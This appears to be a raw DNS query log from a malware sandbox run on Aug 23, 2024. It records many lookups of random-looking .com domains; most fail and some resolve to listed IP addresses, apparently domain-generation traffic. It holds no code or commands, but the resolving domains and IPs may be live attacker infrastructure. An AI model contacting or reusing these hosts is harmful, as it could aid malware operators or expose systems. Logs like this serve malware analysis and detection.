Aug 23, 2024 18:42:11.916814089 CEST	1.1.1.1	192.168.2.5	0x5bd3	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.916928053 CEST	1.1.1.1	192.168.2.5	0x80a2	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.917777061 CEST	1.1.1.1	192.168.2.5	0x192c	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.919589996 CEST	1.1.1.1	192.168.2.5	0x713d	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.920994997 CEST	1.1.1.1	192.168.2.5	0xa889	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.923540115 CEST	1.1.1.1	192.168.2.5	0xbf54	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.923773050 CEST	1.1.1.1	192.168.2.5	0xf8	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.925601959 CEST	1.1.1.1	192.168.2.5	0x27e7	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.928981066 CEST	1.1.1.1	192.168.2.5	0x5487	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.930599928 CEST	1.1.1.1	192.168.2.5	0x15b9	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.930793047 CEST	1.1.1.1	192.168.2.5	0x8167	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.931876898 CEST	1.1.1.1	192.168.2.5	0x4556	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.938250065 CEST	1.1.1.1	192.168.2.5	0xe072	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.942800045 CEST	1.1.1.1	192.168.2.5	0x6249	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.944919109 CEST	1.1.1.1	192.168.2.5	0xe188	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.955811977 CEST	1.1.1.1	192.168.2.5	0xb4a8	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:11.993994951 CEST	1.1.1.1	192.168.2.5	0x2d36	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.017035961 CEST	1.1.1.1	192.168.2.5	0x9918	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.032502890 CEST	1.1.1.1	192.168.2.5	0x53b3	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.033315897 CEST	1.1.1.1	192.168.2.5	0xc8ae	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.033315897 CEST	1.1.1.1	192.168.2.5	0xc8ae	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.033518076 CEST	1.1.1.1	192.168.2.5	0x1029	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.045186996 CEST	1.1.1.1	192.168.2.5	0x9a83	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.051513910 CEST	1.1.1.1	192.168.2.5	0x79a3	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.051513910 CEST	1.1.1.1	192.168.2.5	0x79a3	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.065231085 CEST	1.1.1.1	192.168.2.5	0xa887	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.065231085 CEST	1.1.1.1	192.168.2.5	0xa887	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.077590942 CEST	1.1.1.1	192.168.2.5	0x7249	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.079509020 CEST	1.1.1.1	192.168.2.5	0xf3d1	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.088432074 CEST	1.1.1.1	192.168.2.5	0x5756	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.090133905 CEST	1.1.1.1	192.168.2.5	0xbf0d	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.099363089 CEST	1.1.1.1	192.168.2.5	0xae10	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.131146908 CEST	1.1.1.1	192.168.2.5	0x8858	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.179500103 CEST	1.1.1.1	192.168.2.5	0xb19	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.185600996 CEST	1.1.1.1	192.168.2.5	0xec4e	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.199559927 CEST	1.1.1.1	192.168.2.5	0xace9	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.249078989 CEST	1.1.1.1	192.168.2.5	0xf08e	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.363236904 CEST	1.1.1.1	192.168.2.5	0x75f5	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.454693079 CEST	1.1.1.1	192.168.2.5	0x4ac1	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.473922014 CEST	1.1.1.1	192.168.2.5	0xbe78	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.492079020 CEST	1.1.1.1	192.168.2.5	0xa264	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.525315046 CEST	1.1.1.1	192.168.2.5	0xd24a	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.539124012 CEST	1.1.1.1	192.168.2.5	0x4413	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.610327959 CEST	1.1.1.1	192.168.2.5	0x522b	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.788075924 CEST	1.1.1.1	192.168.2.5	0xf6eb	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.834935904 CEST	1.1.1.1	192.168.2.5	0x3042	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.834935904 CEST	1.1.1.1	192.168.2.5	0x3042	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:12.849508047 CEST	1.1.1.1	192.168.2.5	0x86fc	No error (0)	www.gahyqah.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:12.849508047 CEST	1.1.1.1	192.168.2.5	0x86fc	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:13.335566044 CEST	1.1.1.1	192.168.2.5	0xbe79	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:13.350532055 CEST	1.1.1.1	192.168.2.5	0xcbc7	No error (0)	ww1.lysyfyj.com	9145.searchmagnified.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:13.350532055 CEST	1.1.1.1	192.168.2.5	0xcbc7	No error (0)	9145.searchmagnified.com		208.91.196.145	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094731092 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094742060 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:14.094750881 CEST	1.1.1.1	192.168.2.5	0x4ef5	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:15.714337111 CEST	1.1.1.1	192.168.2.5	0x19b7	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.765702963 CEST	1.1.1.1	192.168.2.5	0x208f	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.767193079 CEST	1.1.1.1	192.168.2.5	0xa565	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.767920017 CEST	1.1.1.1	192.168.2.5	0xf8c4	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.769190073 CEST	1.1.1.1	192.168.2.5	0x82a6	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.769190073 CEST	1.1.1.1	192.168.2.5	0x82a6	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.770301104 CEST	1.1.1.1	192.168.2.5	0xc238	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.771023035 CEST	1.1.1.1	192.168.2.5	0xc232	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.772799969 CEST	1.1.1.1	192.168.2.5	0xeb4b	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.773823977 CEST	1.1.1.1	192.168.2.5	0x290e	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.776637077 CEST	1.1.1.1	192.168.2.5	0x66c0	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.776732922 CEST	1.1.1.1	192.168.2.5	0xa803	Name error (3)	lygynud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.778264999 CEST	1.1.1.1	192.168.2.5	0xfbff	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.780720949 CEST	1.1.1.1	192.168.2.5	0x8405	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.781081915 CEST	1.1.1.1	192.168.2.5	0x3370	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.786559105 CEST	1.1.1.1	192.168.2.5	0xe4f8	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.787040949 CEST	1.1.1.1	192.168.2.5	0x2292	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.789273024 CEST	1.1.1.1	192.168.2.5	0x34a8	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.791865110 CEST	1.1.1.1	192.168.2.5	0xb020	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.792996883 CEST	1.1.1.1	192.168.2.5	0x5133	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.793416023 CEST	1.1.1.1	192.168.2.5	0x4f58	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.793425083 CEST	1.1.1.1	192.168.2.5	0xd349	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.795368910 CEST	1.1.1.1	192.168.2.5	0x6675	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.800116062 CEST	1.1.1.1	192.168.2.5	0x7221	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.800995111 CEST	1.1.1.1	192.168.2.5	0x730a	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.805000067 CEST	1.1.1.1	192.168.2.5	0x661d	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.808067083 CEST	1.1.1.1	192.168.2.5	0x8078	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.808465004 CEST	1.1.1.1	192.168.2.5	0xc839	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.813160896 CEST	1.1.1.1	192.168.2.5	0x5d03	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.813560963 CEST	1.1.1.1	192.168.2.5	0x95e8	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.814763069 CEST	1.1.1.1	192.168.2.5	0x344b	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.815471888 CEST	1.1.1.1	192.168.2.5	0x6dc7	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.819978952 CEST	1.1.1.1	192.168.2.5	0x893e	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.820064068 CEST	1.1.1.1	192.168.2.5	0x8289	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.821494102 CEST	1.1.1.1	192.168.2.5	0x7ce7	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.824676991 CEST	1.1.1.1	192.168.2.5	0xa40c	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.824778080 CEST	1.1.1.1	192.168.2.5	0xb9d4	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.825452089 CEST	1.1.1.1	192.168.2.5	0x8cbc	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.825491905 CEST	1.1.1.1	192.168.2.5	0xdc5a	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.825542927 CEST	1.1.1.1	192.168.2.5	0x284a	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.825591087 CEST	1.1.1.1	192.168.2.5	0x4bfc	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.826122046 CEST	1.1.1.1	192.168.2.5	0x1c99	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.826560020 CEST	1.1.1.1	192.168.2.5	0xba1f	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.827218056 CEST	1.1.1.1	192.168.2.5	0x8a9c	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.827485085 CEST	1.1.1.1	192.168.2.5	0xfd22	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.830574989 CEST	1.1.1.1	192.168.2.5	0x90ba	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.836255074 CEST	1.1.1.1	192.168.2.5	0x48c3	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.836282969 CEST	1.1.1.1	192.168.2.5	0x7c64	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.836829901 CEST	1.1.1.1	192.168.2.5	0x51cf	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.840084076 CEST	1.1.1.1	192.168.2.5	0xaf44	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.841394901 CEST	1.1.1.1	192.168.2.5	0x5b50	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.843419075 CEST	1.1.1.1	192.168.2.5	0xcd30	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.843585014 CEST	1.1.1.1	192.168.2.5	0x49b4	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.847063065 CEST	1.1.1.1	192.168.2.5	0x6bc1	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.847388983 CEST	1.1.1.1	192.168.2.5	0x3d31	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.847697020 CEST	1.1.1.1	192.168.2.5	0xb893	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.847779989 CEST	1.1.1.1	192.168.2.5	0x3f81	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.847836018 CEST	1.1.1.1	192.168.2.5	0x69e6	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.849268913 CEST	1.1.1.1	192.168.2.5	0x53ea	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.878618002 CEST	1.1.1.1	192.168.2.5	0xd5ce	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.878618002 CEST	1.1.1.1	192.168.2.5	0xd5ce	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.917593002 CEST	1.1.1.1	192.168.2.5	0x1f12	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.928212881 CEST	1.1.1.1	192.168.2.5	0x8c2	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.931130886 CEST	1.1.1.1	192.168.2.5	0x7604	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.931683064 CEST	1.1.1.1	192.168.2.5	0x7912	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.970510006 CEST	1.1.1.1	192.168.2.5	0x5759	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:25.970510006 CEST	1.1.1.1	192.168.2.5	0x5759	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.051321983 CEST	1.1.1.1	192.168.2.5	0x7de6	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.381335974 CEST	1.1.1.1	192.168.2.5	0xb155	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:26.381335974 CEST	1.1.1.1	192.168.2.5	0xb155	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:26.381335974 CEST	1.1.1.1	192.168.2.5	0xb155	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.893002987 CEST	1.1.1.1	192.168.2.5	0xa2f9	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.893002987 CEST	1.1.1.1	192.168.2.5	0xa2f9	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:26.977746964 CEST	1.1.1.1	192.168.2.5	0xc8ca	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:27.206300974 CEST	1.1.1.1	192.168.2.5	0x2e05	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:27.206300974 CEST	1.1.1.1	192.168.2.5	0x2e05	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:42:27.206300974 CEST	1.1.1.1	192.168.2.5	0x2e05	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.257415056 CEST	1.1.1.1	192.168.2.5	0xe76a	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.260566950 CEST	1.1.1.1	192.168.2.5	0x83f8	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.261670113 CEST	1.1.1.1	192.168.2.5	0xaf69	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.262492895 CEST	1.1.1.1	192.168.2.5	0xff6d	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.263953924 CEST	1.1.1.1	192.168.2.5	0x6fed	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.264735937 CEST	1.1.1.1	192.168.2.5	0xccd7	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.266412020 CEST	1.1.1.1	192.168.2.5	0xb3a4	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.271955013 CEST	1.1.1.1	192.168.2.5	0x47fe	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.272121906 CEST	1.1.1.1	192.168.2.5	0x3892	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.272574902 CEST	1.1.1.1	192.168.2.5	0xccad	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.274147034 CEST	1.1.1.1	192.168.2.5	0x9747	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.279895067 CEST	1.1.1.1	192.168.2.5	0xb6cb	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.279977083 CEST	1.1.1.1	192.168.2.5	0xa2ce	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.281131983 CEST	1.1.1.1	192.168.2.5	0xa7c6	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.282073975 CEST	1.1.1.1	192.168.2.5	0xde5e	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:42:46.284447908 CEST	1.1.1.1	192.168.2.5	0x934f	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
